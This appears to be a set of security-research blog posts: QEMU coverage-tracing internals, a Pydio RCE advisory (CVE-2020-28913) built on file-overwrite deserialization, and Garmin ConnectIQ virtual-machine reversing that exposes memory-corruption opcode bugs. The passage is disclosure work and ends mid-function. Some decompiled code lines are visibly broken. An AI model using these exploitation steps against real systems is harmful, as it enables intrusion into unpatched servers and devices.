The target was a SoC that had an interesting system spread across multiple processes and libraries. We could communicate with this system from the external network, and we wanted to know the extent of our reach before authentication. Because of the design of the system, it was not simple to track down all the places our influence reached without valid credentials. A better map of that surface area would be helpful for further findings. We had done the prior work to get the target up and running in QEMU, so why not just have the emulator tell us?

Tracing in QEMU

Tracing guest execution in QEMU is not as simple as calling printf(“%p\n”, pc); for every instruction. The thing that puts the Q in QEMU is the TCG. The TCG (Tiny Code Generator) is a just in time compiler that will translate blocks of guest instructions to code that can run on the host. While it would be simple to trace each new block translated, once they are translated the blocks can run multiple times unimpeded and untracked by QEMU code. If all that is needed is a trace of when each block is translated, there is built-in tracing in QEMU that can give that information. (The event is translate_block. See the docs for more details.)

Once a block is translated, the emitted code may be used and reused many times. For our target we wanted to be able to start our trace when the system was in a steady state, when many blocks would have already been translated. If we want to trace every time some basic block is executed in the guest, we need to emit our own operations in front of the rest of the translated block.

There are lots of great references we can turn to for emitting custom operations alongside the translated code. QEMU itself can place instructions before each basic block that are used to count the number of instructions executed. We can follow the call to get_tb_start here in translator.c, which leads here. Operations to check the instruction count are added so execution can be halted if a limit is reached.

    tcg_gen_ld_i32(count, cpu_env,
                   offsetof(ArchCPU, neg.icount_decr.u32) -
                   offsetof(ArchCPU, env));

    if (tb_cflags(tb) & CF_USE_ICOUNT) {
         * We emit a sub with a dummy immediate argument. Keep the insn index
         * of the sub so that we later (when we know the actual insn count)
         * can update the argument with the actual insn count.
        tcg_gen_sub_i32(count, count, tcg_constant_i32(0));
        icount_start_insn = tcg_last_op();

    tcg_gen_brcondi_i32(TCG_COND_LT, count, 0, tcg_ctx->exitreq_label);

The piece of gen_tb_start emitting the conditional branch

Thankfully, we do not have to specify individual operations like the icount code does. To simplify things, QEMU can generate “helper” functions which will generate operations to call out to a native function from within the translated blocks. This is what AFL++’s fork of qemu uses for its tracing instrumentation without having to modify the guest binary. AFL++’s qemu has to track unique paths taken, and the code makes for a good example for our use case. The In the AFL++ fork, the function afl_gen_trace is called immediately before a basic block is translated.

tcg_ctx->cpu = env_cpu(env);
    gen_intermediate_code(cpu, tb, max_insns);

In tb_gen_code where afl emits operations to trace execution

They there call gen_helper_afl_maybe_log, but searching the source we can find no definition for that function. This is a helper function. The build system will create a definition that will emit operations to perform a call to the function HELPER(afl_maybe_log).

void HELPER(afl_maybe_log)(target_ulong cur_loc) {

  register uintptr_t afl_idx = cur_loc ^ afl_prev_loc;


  afl_prev_loc = cur_loc >> 1;


AFL++'s trace helper, adjusting a map in shared memory

The function was declared here as DEF_HELPER_FLAGS_1(afl_maybe_log, TCG_CALL_NO_RWG, void, t1). QEMU’s build system will handle generating the code to create TCG operations to call the helper function. The “_1” indicates it takes one argument, and the last two arguments to the macro are the return type, and the argument type. tl indicates target_ulong. Another helpful argument type is env which passes an CPUArchState * argument to the helper function. ptr, i64, f32, and such all do what they say on the tin.

For our tool, we used a helper function to call to call out at the beginning of every code block. In target/arm/translate.c we added gen_helper_bb_enter(cpu_env, tcg_constant_i32(4)) in the function arm_tr_tb_start which is called at the beginning of translating every block for an ARM guest. This will generate code for each basic block that will call our function HELPER(bb_enter).

This leads us to another problem we encounter when trying to trace such a complex system. On our target, if we implement HELPER(bb_enter) with fprintf(logfile, “@%p\n”, env->regs[15]) we are quickly going to slow our emulator to a crawl, and be left with huge unreasonable files. In our case, we did not care too much about the order in which these basic blocks were hit, we just cared what basic blocks were uniquely hit when we interact with the system over the network. For this we implemented a form of Differential Debugging.

We had to communicate to QEMU when to start and stop a trace, so we could take separate recordings. A recording of area covered while running the system without interacting with it over the network, and a separate recording of lots of various non-authenticated interaction with the system over the network. We then found the area covered in the second recording that was not covered in the first. Then we had our tool report this as surface area to be further tested and reviewed for vulnerabilities.

To do this we implemented the tracing as a bitmap of the address space we cared about. We adjusted the granularity of our map so that every entry accounted for 0x10 bytes of code, which for our 32-bit arm target produced perfectly manageable file sizes.

// paddr to start watching
#define MAP_START_PADDR 0x80000000
// size of memory region
#define MAP_SIZE        0x20000000
#define MAP_GRAN_SHF    4   // 0x10 granularity

#define BB_MAP_INDEX(addr)  ((addr - INDX_OFF) >> 3)
#define BB_MAP_BIT(addr)    (addr & ((1<<3)-1))

unsigned char bb_map[(MAP_SIZE >> (MAP_GRAN_SHF + 3))];
void HELPER(bb_enter)(CPUARMState *env, int blksz)
    /* ... */
    pend = pstart + blksz - 1;

    if ((pstart < MAP_START_PADDR) || (pstart >= MAP_END_PADDR)) {
        // not in region

    if (pend >= MAP_END_PADDR) {
        pend = MAP_END_PADDR-1;

    pstart >>= MAP_GRAN_SHF;
    pend >>= MAP_GRAN_SHF;

    while (pstart <= pend) {
        bb_map[BB_MAP_INDEX(pstart)] |= (1 << BB_MAP_BIT(pstart));


Piece of relevant code for implementing our tracing bitmap

We also had to add some method to communicate to our emulator when to start, stop, clear, or write out a coverage map. QEMU provides a nice way to implement commands such as these in its HMP (human monitor) system. The documentation contains instructions on how to add monitor commands. The basic process involves adding an entry in the hmp-commands.hx file describing the command names, the arguments expected, and a bit of info about the command. The handler declarations can go in include/monitor/hmp.h, and the definitions typically go in monitor/hmp-cmds.c.

We implemented a clear, start, stop, and write command for our tracing.

For many targets this would be enough, and we could move on to writing tooling to convert our coverage information to file offsets. The system we wanted to gather info on was running in usermode code across multiple processes on our target. If we had logged based on the instruction pointer, we would have a trace of virtual addresses across all processes. Most of these virtual addresses are not going to be unique across processes, rendering our system coverage mostly meaningless.

We got around this issue with a bit of a hack. By translating the virtual address of the instruction pointer to a physical address, we can avoid aliasing between processes. This works for the system we were testing because the relevant processes all remained running the whole time. For an extra measure we turned swap off, keeping our pages from moving around underneath us.

This is probably not a Good Idea™ for most tracing use cases, but it worked well for our setup and we were able to implement it quickly. We made use of a function in QEMU called get_phys_addr that exists for ARM targets. We probably would have been better off using something that made use of the TLB, as the constant translation slowed down the emulator noticeably when our tracing was enabled.

    target_ulong start;
    hwaddr pstart;
    hwaddr pend;
    MemTxAttrs attrs = { 0 };
    int prot = 0;
    target_ulong page_size = { 0 };
    ARMMMUFaultInfo fi = { 0 };
    ARMCacheAttrs cacheattrs = { 0 };

    start = env->regs[15];
    // convert to physical address

    // >:|
    // returns bool, but 0 means success
    if (get_phys_addr(
    )) {
        printf("DBG Could not get phys addr for %x\n", start);

Our call to get_phys_addr to translate the instruction pointer into a physical address

To work with physical addresses, we confined our coverage map to the part of the physical address space that we knew was correlated with RAM. Before and after obtaining our two coverage recordings we took physical memory dumps of our system using the existing QEMU monitor command pmemsave. To parse the coverage date for unique coverage, we made a small script that evaluated the dumps, the coverage maps, and any relevant binary files. Upon finding bits in the bitmap that are unique to the second recording, the script checks if the memory dumps show this to be in one of the relevant binary files. We cannot do exact matching on the binary files because relocations will have changed the contents, so we simply align the text section and check if it is “near enough” a match. With a good threshold for “near enough” we obtained accurate results. From there we translated the unique bit locations to file offsets and generate coverage data that could be used with IDA, Binary Ninja, or Ghidra.

(Lighthouse is our favorite coverage plugin for IDA and Binary Ninja. Dragon Dance is a good alternative for Ghidra. Lighthouse’s modoff format is very simple to implement. If coverage compatible with Dragon Dance is needed, the drcov format is simple enough to implement, and Qiling framework has some good example code for generating it.)


This solution worked well for our target and gave us some areas to dig into that would have otherwise been difficult to find quickly. The purpose of this post is not to introduce some new fork of QEMU with this tool built in. There are already too many unmaintained forks of QEMU for vulnerability research, and this tool would be a lot less effective in other situations. This is meant as more of a love note to QEMU, and hopefully inspires other researchers to make better use of their favorite emulator. The internals of QEMU made so our tracing tool could be developed quickly, and we could return focus to finding vulnerabilities.

Authenticated RCE in Pydio (Forever-Day) -- CVE-2020-28913

7 December 2020 at 14:00

Pydio (formerly AjaXplorer) is an open source web application for remotely managing and sharing files. Users may upload files to the server and then are enabled to share files with public links in a similar way that Google Drive, Dropbox, or other cloud services work.

By sending a file copy request with a special HTTP variable used in code, but not exposed in the web UI, an attacker can overwrite the .ajxp_meta file. The .ajxp_meta file is a serialized PHP object written to the user’s directory and is deserialized when Pydio needs information about files it stores.

POST /pydio/index.php? HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/pydio/ws-my-files/
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://example.com
Content-Length: 124
Connection: close
Cookie: AjaXplorer=ak7jio5pphe6onko1gcofj05k4


Note the HTTP variable targetBaseName which defines a new name for the file copy. This variable is not checked to prevent overwriting special files. After uploading a file called payload containing our PHP gadget, we copy it over the .ajxp_meta file.

The contents of the payload file you can override the .ajxp_meta with may look similar to this PHP gadget. In tools like phpggc, which store collection of gadgets, there are a few that looked promising. However, in my own testing, none of the gadgets worked and I didn’t dig enough to find out why. Instead, I found a class used to generate Captcha images, which allowed you define a custom SoX binary path (so the captcha can be read for accessibility). This was my first foray into PHP gadgets and the path to finding this class was haphazard at best.


The above PHP object gadget will attempt to run a binary file that has been uploaded to the user's directory called shell.elf. We do make an assumption about a path on the server by passing an absolute path to the shell binary we uploaded. During testing, the location in the gadget was the default location with no special Pydio configurations.

This vulnerability affects the last release of Pydio Core (8.2.5) and likely many versions prior. Git blame places the code originally being committed in late 2016.

Pydio Core is considered End-of-Life by the Pydio developers and, as such, will receive no security patches going forward. Pydio Enterprise users should contact Pydio directly to mitigate the issue. The Pydio developers encourage users to upgrade to Pydio Cells, which is a complete rewrite of Pydio in Go and is not vulnerable.


* 2020-09-03: Atredis Partners sent an initial notification to vendor, including a draft advisory.

* 2020-10-26: Atredis Partners sends an initial notification to CERT/CC (VRF#20-10-SWJYN).

* 2020-11-17: CVE-2020-28913 assigned by MITRE

* 2020-12-07: Atredis Partners publishes this advisory.

This blog post was written by Brandon Perry, technical peer review by Dion Blazakis, and edited for the web by Lacey Kasten at Atredis Partners.

A Watch, a Virtual Machine, and Broken Abstractions

17 November 2020 at 17:00

Garmin Forerunner 235

One upside to living in a cyberpunk-adjacent fever dream is the multitude of (relatively) inexpensive supercomputers you can strap to your body. I recently bought a watch equipped with an array of sensors (and supporting microcontrollers) to record hikes, runs, and rides. The device, a Garmin Forerunner 235, is far from the most advanced piece of technology you can buy to perform these tasks but, so far, has performed well. My partner also has a Garmin watch and rushed to show me all of the customization options available via Garmin’s ConnectIQ Store and App. That's how this all started.

Here at Atredis Partners, I spend a good chunk of time under the delusion I'm a modern Sherlock Holmes. From the outside, I'm just a middle aged person lacking sleep and, evidently, the wherewithal to shave regularly. But, in my head, I'm hot on the trail of some computational mystery. Each engagement is a frantic sprint from layman to myopic expert. To give our customers the best assessment of their technology, we have to optimize where our time is spent. We need to understand the system design in order to evaluate tradeoffs between attack surface, impact, and complexity. The sooner we understand a technology, the more hours we have to allocate and arrange, Jenga-like, into a plan of attack. The more complete our understanding, the more accurate and complete our determination of impact and severity. When you spend your life understanding the most important (for some definition) parts of hundreds of devices in three week bursts of effort, every device looks like a new mystery to be solved.

Some people would spend their time away from these mental sprints actually hiking, running, or biking with their cool new watch (and I do that, sometimes). I, instead, needed to understand how this wrist-based computational cluster worked. To be precise, this project was driven by my curiosity, not by nascent privacy concern. This project wasn't an effort to point out all the security bugs or persuade you that balaclava-clad shadows are tracking your every movement. I make no privacy judgement either way -- you'll have to judge your own risk tolerance. Finally, I've enjoyed my Garmin watch and the company was easy to work with while reporting issues. This isn't an indictment of their products.

TL;DR: I'm a nerd. I bought an exercise watch and promptly stopped exercising to tear it apart.

Information Gathering


All of this started with a casual mention that Garmin provides a third party app store, ConnectIQ (abbreviated as CIQ), for Garmin devices. CIQ consists of an app store (https://apps.garmin.com/en-US/), a smart phone app to install CIQ Apps on your Garmin device, and a free software development kit (SDK) for developing CIQ Apps (https://developer.garmin.com/connect-iq/overview/). With my deerstalker on and a pipe firmly between my teeth, the link to the ConnectIQ SDK was the first note I took in my gumshoe notebook. As far as attack surface goes (even in our broader lens of overall system understanding), being able to run code on the device is hard to beat when it comes to tools for understanding a system.


The firmware was the next clue, and this one was a gamble. Devices often have encrypted or "encrypted" (encoded with the intent to obfuscate) firmware. In this case, a quick web search turned up a community repository of installable firmware updates for Garmin devices (repository is currently down). I jotted down the Forerunner 235 firmware in my metaphorical steno pad.


The firmware runs on some set of programmable devices within the watch. Without knowing which microcontrollers are included in the watch design, reversing is more difficult. Knowing the architecture and memory map of the system-on-chips (SoCs) used will provide more clues towards understanding how the firmware is loaded and executed. Having a bill-of-materials or some approximation of such is not a strict necessity, but provides a good reference going forward while taking apart the firmware. Another web search turned up a teardown for a similar device and the FCC images provided additional clues. These were also recorded in the notepad, providing another category of data to draw from.

The Screaming Hoards

Lastly and reluctantly, it’s time to check if anyone has stolen our fun. Has someone already written up their efforts at understanding a Garmin device? Some searching produced a very nice write up of a TomTom watch and a handful of file format reverse engineering. This is a considerably good outcome -- our fun hadn’t been cut off but we do have a head start on some of the artifacts we'll need to analyze. I took note of links to the firmware update format (RGN) and a GitHub repository related to the CIQ application format (PRG).

Our Investigative Notes So Far

Device Hardware

Datasheets (based on the 735XT teardown -- not sure about 235)

Development Kits

Device Firmware

Host Tools

Similar Stuff

Moving on to Monkey C

The Game is Afoot

With our initial flurry of web searches done, it was time to start somewhere. As I mentioned above, the ability to run your own code on the watch seems like a great place to start. Heading to the Garmin ConnectIQ site and reading more about the developer tools revealed that CIQ Apps are developed in a custom language called Monkey C. A custom language is surprising enough to require some follow-up research before diving into the actual SDK provided. The question at hand was: why did Garmin decide on a custom language?

Before unraveling that question, it’s important to take a glance at the language. As you can see below, the language appears to be made of JavaScript and Java.

using Toybox.WatchUi;
using Toybox.Graphics;
using Toybox.System;
using Toybox.Lang;

class AtrediFaceView extends WatchUi.WatchFace {
    function onExitSleep() {

    function foo() {
        var x = 0xf00d;
        System.println("0xf00d + 1 = " + (x + 1).toString());

Using the SDK provided by Garmin, it is possible to compile and run this code:

(venv) ➜  AtrediFace make
monkeyc -o ./bin/AtrediFace.prg \
        -y ../connectiq-sdk-mac-3.1.7-2020-01-23-a3869d977/developer_key \
        -f ./monkey.jungle \
        -d fr235
(venv) ➜  AtrediFace touch /Volumes/GARMIN/GARMIN/APPS/LOGS/AtrediFace.TXT
(venv) ➜  AtrediFace cp bin/AtrediFace.prg /Volumes/GARMIN/GARMIN/APPS/

Notice that it was possible to sideload an App by copying the PRG file onto the watch. When the watch is plugged into the computer, it exposes a file system as a USB Mass Storage device.

Once the watch is unplugged, we'll see our beautiful Atredis bird soaring onto the watch face. After the watch face program has executed, debug output can be found on the FAT file system (after, once again, plugging the watch back into the computer).

(venv) ➜  AtrediFace cat /Volumes/GARMIN/GARMIN/APPS/LOGS/AtrediFace.TXT
0xf00d + 1 = 61454

Now that we're able to code some simple Monkey C, compile it to a PRG file, and run the code on the watch, we can get back to trying to answer the burning question of: But why?

Further reading on the Garmin developer website, forum, and a few web searches provides more background. A Garmin-authored presentation provides the justification for a new language and corresponding virtual machine. The Garmin applications, like Java applications, execute bytecode on a virtual machine. Like Android (and the Infocom Z-machine and Java Card systems before it), the CIQ applications are intended to run on a wide variety of devices. Further, the Garmin devices are limited in resources (computation, memory, and battery) and any runtime/OS environment should be able to restrict each client application's usage of these resources. Finally, the Garmin OS and application execution environment need to be able to enforce access control and isolation -- this includes memory isolation when lacking strong virtual memory subsystem within the OS. A badly behaving CIQ application should not be able to bring down the entire watch (i.e., Garmin wanted to be better than Windows 95).

The reasoning for running these applications in a virtual machine is clear. Garmin decided to develop a full ecosystem of language, compiler, runtime, and virtual machine to support this. That means we get to reverse-engineer all of it! 🎉 The language is documented in the SDK documentation. The compiler is provided in the SDK and can be reversed from that. The language runtime is implemented in firmware with the interface specified in the SDK. The virtual machine is not publicly documented but can be understood based on a combination of the compiler and the firmware.

This last bit, the details around the virtual machine, is most interesting to me. Using this mapping between concept and implementation, we'll attempt to answer the following questions by reverse engineering the compiler and firmware:

  1. What does the virtual machine executable image look like?

  2. Can the virtual applications mix native code with bytecode?

  3. What is the architecture of the virtual machine?

  4. How does the virtual machine interface with native code for the SDK?


The downloadable SDK is mostly Java class files. It decompiles extremely well. The monkeybrains package includes a number of interesting tools but we focus on the compiler and assembler that work together to produce a PRG file. Pulling these apart provides a decent view of the PRG file structure. The high-level structure encapsulates a number of sections enveloped as type-length-value (TLV) structures. These sections include debugging metadata, bytecode, data, resources (e.g., strings for translations, bitmaps), and linking information for the runtime. There is an existing open source project, ciqdb, to parse much of this file format (although it does not handle the sections with the bytecode or the embedded resources yet).

Within the asm package, the Opcode class contains constants with mnemonic names for 55 different opcodes. Now, we have (mostly) familiar looking mnemonics that we can map to opcodes. Further reversing of the decompiled asm package leads us to an understanding of the bytecode stream from the PRG files. Below is a short hand disassembly of the foo function shown in Monkey C above:

The PRG bytecode for the foo function is:

00000110: 35 01 01 01 25 00 00 F0  0D 13 01 27 00 80 00 05  5...%......'....
00000120: 30 27 00 80 00 67 0D 2A  18 00 00 02 CF 12 01 25  0'...g.*.......%
00000130: 00 00 00 01 03 27 00 80  00 AF 0D 2A 0F 01 03 0F  .....'.....*....
00000140: 02 02 16 35 01 01 00 12  00 27 00 80 02 9C 0D 27  ...5.....'.....'

The disassembly looks something like:

00000110: 35 01            ARGC 1
00000112: 01 01            INCSP 1
00000114: 25 00 00 F0 0D   IPUSH 0xF00D
00000119: 13 01            LPUTV 1
0000011B: 27 00 80 00 05   SPUSH 0x800005 ; "Toybox_System"
00000120: 30               GETM
00000121: 27 00 80 00 67   SPUSH 0x800067 ; "println"
00000126: 0D               GETV
00000127: 2A               FRPUSH
00000128: 18 00 00 02 CF   NEWS 0x2CF ; "0xf00d + 1 = " 
0000012d: 12 01            LGETV 1
0000012f: 25 00 00 00 01   IPUSH 0x01
00000134: 03               ADD
00000135: 27 00 80 00 AF   SPUSH 0x8000AF ; "toString"
0000013a: 0D               GETV
0000013b: 2A               FRPUSH
0000013c: 0F 01            INVOKE 1
0000013e: 03               ADD
0000013f: 0F 02            INVOKE 2
00000141: 02               POPV
00000142: 16               RETURN

So far, we've answered our initial question about the executable image format and we can start guessing at the virtual machine organization. Unfortunately, we don't have quite enough information in the compiler/assembler to answer much more about the system definitively. For that, we should move along and start working on the firmware. Specifically, we need to find the portion of the firmware responsible for loading, parsing, and executing these PRG images.


A quick google for Garmin Forerunner firmware provides the official Garmin website. While the release notes are good, there does not appear to be a direct download of the firmware images from the website. Luckily, someone else already yanked the firmware from wherever the Garmin Connect app pulls from. (Or, at least, they used to. The archive of firmware was found at http://gawisp.com/perry/forerunner/ but it seems the site is currently down.)

With the firmware in hand, we need to determine how Garmin performs an update. Is the image a flat flash image? Does it contain metadata or a header? Does the format support a partial update? Again, we're lucky because someone has also already figured out the type-length-value (TLV) envelope structure of the GCD update files. There is a document providing information on the structure. All it takes is a little time with our best friend hexdump -C to see that the Forerunner 235 update contains two "large" images that can be pulled out. Interestingly, one is the size of the SRAM on the SoC we identified earlier via the teardown (of the Maxim MAX32630) and the other is the size of the internal flash. If I had to bet, I'd believe the first is a bootstrap that is written into SRAM so the firmware that is eXecute-In-Place can be replaced. We can write a quick Python script to extract the "main" firmware that we believe is written to the internal flash.

    def parse(cls, f):
        header = f.read(8)
        if header != b'GARMINd\x00':
            raise Exception('Unknown firmware format')

        tlvs = []
        while True:
            data = f.read(4)
            if len(data) != 4: break

            tag, length = struct.unpack('<HH', data)
            value = f.read(length)
            tlvs.append((tag, length, value))
            print('  0x{:04x}: 0x{:04x}'.format(tag, length))

        return cls(tlvs)

With the main firmware extracted, our ARM RE fingers should really be starting to itch. From the datasheet of the MAX32630, we know the internal flash is probably mapped starting at 0x0. Since the extracted flat image is mapped directly, there is no need for a dedicated IDA loader plugin -- the IDA load UI is flexible enough. Once the image is loaded and the appropriate architecture for the Cortex-M is selected, adding segments for SRAM and the peripheral ranges provide a solid starting point for the reverse engineering effort.

After running some Thumb function finding heuristic scripts against the initial database, what next? Our first goal is to find the code responsible for parsing and running the virtual machine programs. The parsing logic is probably the better of the two to start with -- the identification of the parsing logic will also help identify the runtime representation of the program. In most cases, the parsing logic will output an internal runtime representation. Understanding this runtime structure provides context for all reverse engineering of the execution or processing surrounding the loaded program. In this case, taking the time to create and refine the internal runtime context structure is worth the effort.

A quick look at the strings identified by IDA doesn't immediately provide any hints around the PRG processing. When strings are lacking, the next best handhold is using unique constants. In this case, the PRG tags are unique 32-bit integers perfect for IDA's "Search -> Immediate value...". Searching for 0xd000d000, the main PRG header tag, reveals a single function passing this value into a sub function. Perfect!

unsigned int __fastcall read_prg_header(int a1, _DWORD *a2, int a3)

  v4 = a1;
  v5 = prg_extract_section_data(a1, 0xD000D000, &a3a, &out_offset, 1u);
  v6 = (void *)mem_alloc(a3a.length, 3, &handle);
  handle = v6;
  if ( !v6 )
    goto LABEL_2;
  if ( v5 == (void *)1 )
    v9 = (int *)mem_pointer_borrow(v6);
    v10 = v9;
    v11 = file_read_(v4, v9, a3a.length);
    if ( v11 == a3a.length )
      v17 = *v10;
      if ( a2 )
        v12 = a3a.length;
        v13 = v17;
        *a2 = a3a.tag;

Using this as a starting point and walking up and down the call stack surrounding this function reveals, as we hoped, the code for parsing a PRG file. We will spare the reader three weeks of reverse engineering play-by-play as the virtual machine, deemed the "TVM" by Garmin, is analyzed and the runtime objects and utilities are reversed. In addition to the TVM, the OS structures and APIs need to be reversed along the way. The watch runs a Garmin developed OS but context clues and a few useful strings help determine the general OS object APIs. The OS provides abstractions for objects such as semaphores, tasks, events, and queues. A layer above this provides a file system abstraction and memory allocation routines. The TVM layers a richer abstraction on the memory allocation logic for tracking TVM program quotas and for maintaining reference counts on allocated buffers.

The TVM is a stack-based virtual machine. Each runtime value is stored along with the accompanying type. Opcodes manipulate values stored on the stack and can reference local variables reserved on the stack by index. Values are created at runtime by loading data from the PRG data section or via immediate values embedded in the bytecode stream. Once loaded onto the stack, the value can be manipulated and passed around the system. All runtime allocations are tracked per TVM instance. This tracking is an effort to prevent a buggy or malicious program from taking down the entire system via resource exhaustion. Runtime objects are also reference counted, as noted above, and are deterministically garbage collected when the last reference is released.

During analysis of the TVM context block, the PRG loading, and the runtime initialization, we're able to make some progress toward understanding how the virtual machine interacts with the native runtime (one of our overall goals). Below is an excerpt from a function we named tvm_run_function. This function is used to enter a TVM function based on a TVM virtual address, for example when handling a CALL opcode or to run initialization function after loading the PRG. We can see that, based on the high bits of the address, the TVM either executes a native function based on a function pointer table (tvm_native_methods) or executes bytecode by entering the opcode dispatch loop (tvm_execute_opcodes).

  if ( (function_addr.value & 0xFF000000) == 0x40000000 )
    v17 = LOWORD(function_addr.value);
    if ( LOWORD(function_addr.value) > 0xC5u )
      v8 = 15;
      goto LABEL_4;
    ctx->pc_ptr = (char *)tvm_native_methods[LOWORD(function_addr.value)];
    v18 = tvm_native_methods[v17]((int)ctx, a4);
    if ( v18 == 21 )
      return v8;
    if ( tvm_native_methods[v17] != sub_10F18C )
      if ( v18 )
        goto LABEL_15;
      v18 = tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
    if ( !v18 )
      v18 = tvm_op_return(ctx);
    v18 = tvm_tvmaddr_to_ptr(ctx, function_addr.value, &ctx->pc_ptr);
    if ( !v18 )
      v18 = tvm_execute_opcodes(ctx);

After weeks of reverse engineering and marking up an IDA database, we've answered questions 2, 3, and 4 pretty well. Additionally, along the way, we've identified a handful of code that appears to violate contracts made amongst the virtual machine runtime. Maybe the real treasures were the bugs we found along the way?

TVM Opcode Bugs

While reversing the TVM system, we noted a number of the opcode handlers performed operations that appeared to break the virtual machine abstraction. Below, we'll follow up on each of those. More information about each vulnerability, including the disclosure timeline, can be found at ATREDIS-2020-0004, ATREDIS-2020-0005, ATREDIS-2020-0006, and ATREDIS-2020-0007.


One instruction, NEWA, is used to create an runtime array of TVM values of a fixed size. The array is initialized with the null value. NEWA expects a number-like value on the top of the stack indicating the size of the array. Decompilation of the NEWA opcode implementation shows just the one check on the length value (ensuring it is not negative) before passing it to tvm_value_array_allocate for the array size calculation.

int __fastcall tvm_op_newa(struct tvm *ctx)
  struct stack_value *sp;
  int rv;
  unsigned int length;
  struct tvm_value value;

  sp = ctx->stack_ptr;
  length = 0;
  value = *sp;
  rv = tvm_value_to_int(ctx, &value, &length);
  if ( rv ) {
    if ( length stack_ptr);
    if ( rv )
      rv = tvm_value_decref(ctx, &value);
      if ( !rv )
        return tvm_value_incref(ctx, ctx->stack_ptr);
  tvm_value_decref(ctx, &value);
  return rv;

The tvm_value_array_allocate function will perform the unchecked array size calculation as shown below.

int __fastcall tvm_value_array_allocate(struct tvm *ctx, int length, struct tvm_value *array_value)
  unsigned int allocation_size; // r6
  int rv; // r0 MAPDST
  struct tvm_value_array_data *array_data; // r9
  void *array_data_handle; // [sp+4h] [bp-24h] MAPDST

  array_data_handle = 0;
  allocation_size = 5 * length + 15;
  rv = tvm_alloc_for_app(ctx, allocation_size, &array_data_handle);
  if ( !array_data_handle )
    return 7;
  array_data = (struct tvm_value_array_data *)mem_pointer_borrow(array_data_handle);
  memset((int *)array_data, 0, allocation_size);
  array_data->m_0x01 = 1;
  array_data->type = ARRAY;
  array_data->length = length;
  array_value->type = ARRAY;
  array_value->value = (unsigned int)array_data_handle;
  return rv;

The allocation size calculation can overflow the 32-bit integer and can be triggered by creating an array of size 0x33333333. This value is still positive for a 32-bit integer (passing the check in the tvm_op_newa function). When the allocation_size is calculated, the result will overflow the 32-bit unsigned int:

>>> length = 0x33333333
>>> allocation_size = 5 * length + 15
>>> hex(allocation_size)
>>> hex(allocation_size & 0xffffffff)

The original length value (0x33333333) is stored in the resulting tvm_value_array_data and this is the value used to check bounds during the array read and write operations (performed by the AGETV and APUTV instructions).

This can be directly triggered through Monkey C and does not require direct bytecode manipulation to create a proof-of-concept. There are a number of additional constraints to turn this into a reliable read/write anything anywhere primitive but it provides are strong exploit building block.


The instructions LGETV and LPUTV are used to read and write to a local variable. The virtual machine maintains a frame pointer used to point at the start of the frame on the stack. The entry of a method will reserve some space on the stack to store local variables. The LGETV and LPUTV instructions expect a single byte operand specifying the local variable index for that instruction. The implementation does not check that this index is within the previously allocated local variable space as seen below.

int __fastcall tvm_op_lgetv(struct tvm *ctx)
  char *pc_at_entry; // r3
  struct stack_value *sp_at_entry; // r1
  int local_var_idx; // t1
  struct stack_value *local_var_ptr; // r2
  struct stack_value *v6; // r5

  pc_at_entry = ctx->pc_ptr;
  sp_at_entry = ctx->stack_ptr;
  local_var_idx = (unsigned __int8)*pc_at_entry;
  ctx->pc_ptr = pc_at_entry + 1;
  local_var_ptr = &ctx->frame_ptr[local_var_idx + 1];
  ctx->stack_ptr = sp_at_entry + 1;
  sp_at_entry[1] = *local_var_ptr;
  v6 = (struct stack_value *)&ctx->m_0x007b;
  tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
  tvm_value_decref(ctx, v6);
  ctx->m_0x007b = (struct tvm_value)*ctx->stack_ptr;
  tvm_value_incref(ctx, (struct tvm_value *)v6);
  return 0;

The unchecked offset from the frame_ptr of the execution context provides a path to both memory access past the end of the TVM context allocation (the stack is allocated at the end of this structure) and a primitive to construct a use-after-free taking advantage of the way values outside of the valid stack are treated.


The NEWS instruction creates a runtime string object from a string definition structure in the data section of the PRG. Upon execution, this instruction pushes a new tvm_value of type STRING onto the top of the stack. The value of the string is loaded from an address provided as a 32-bit operand. The data at the provided address is expected to contain a string definition of the form:

uint8_t one; // 0x01
uint16_t length;
uint8_t utf8_string[length];

The string data buffer is allocated to hold length bytes and then a function similar to strcpy is used to populate it. The strcpy-like function will only stop when a NUL byte is encountered possibly overflowing the buffer beyond the size of the initial allocation.

int __fastcall tvm_op_news(struct tvm *ctx)
  int tvm_addr_for_string; // r0
  struct stack_value *v3; // r2
  int result; // r0

  tvm_addr_for_string = tvm_fetch_int((int *)&ctx->pc_ptr);
  v3 = ctx->stack_ptr;
  ctx->stack_ptr = v3 + 1;
  v3[1].type = NULL;
  ctx->stack_ptr->value = 0;
  result = tvm_value_load_string(ctx, tvm_addr_for_string, (int)ctx->stack_ptr);
  if ( !result )
    result = tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
  return result;

int __fastcall tvm_value_load_string(struct tvm *ctx, int string_def_addr, int string_value_out)
  int rv; // r0
  unsigned __int8 *string_def; // [sp+4h] [bp-14h]

  rv = tvm_tvmaddr_to_ptr(ctx, string_def_addr, &string_def);
  if ( !rv )
    rv = tvm_string_def_to_value(ctx, string_def, (unsigned __int8 *)string_value_out, 1);
  return rv;

int __fastcall tvm_string_def_to_value(_BYTE *a1, unsigned __int8 *a2, unsigned __int8 *a3, int a4)
  _BYTE *v4; // r6
  unsigned __int8 *v5; // r4
  struct tvm_value *v6; // r5
  int result; // r0
  _BYTE *v8; // r4
  int v9; // r6
  __int16 v10; // r0
  int v11; // r3
  int v12; // [sp+4h] [bp-14h]

  v4 = a1;
  v5 = a2;
  v6 = (struct tvm_value *)a3;
  if ( a4 )
    if ( *a2 != 1 )
      return 5;
    v5 = a2 + 1;
  result = tvm_value_string_alloc_by_size((struct tvm *)a1, v5[1] | (*v5 type == STRING )
        return sub_10DE28(v6);
      return 5;
  return result;

The tvm_string_def_to_value function allocates the string using the size found in memory and then proceeds to strcpy the provided data into the freshly allocated buffer.


The DUP instruction allows the running program to duplicate a value from any slot on the stack and push the copy on the top of the stack.

int __fastcall tvm_op_dup(struct tvm *ctx)
  char *pc; // r1
  struct stack_value *sp; // r2
  int stack_offset; // t1
  struct tvm *ctx:v4; // r3
  int v5; // r0
  struct stack_value v7; // [sp+0h] [bp-10h]

  pc = ctx->pc_ptr;
  sp = ctx->stack_ptr;
  stack_offset = (unsigned __int8)*pc;
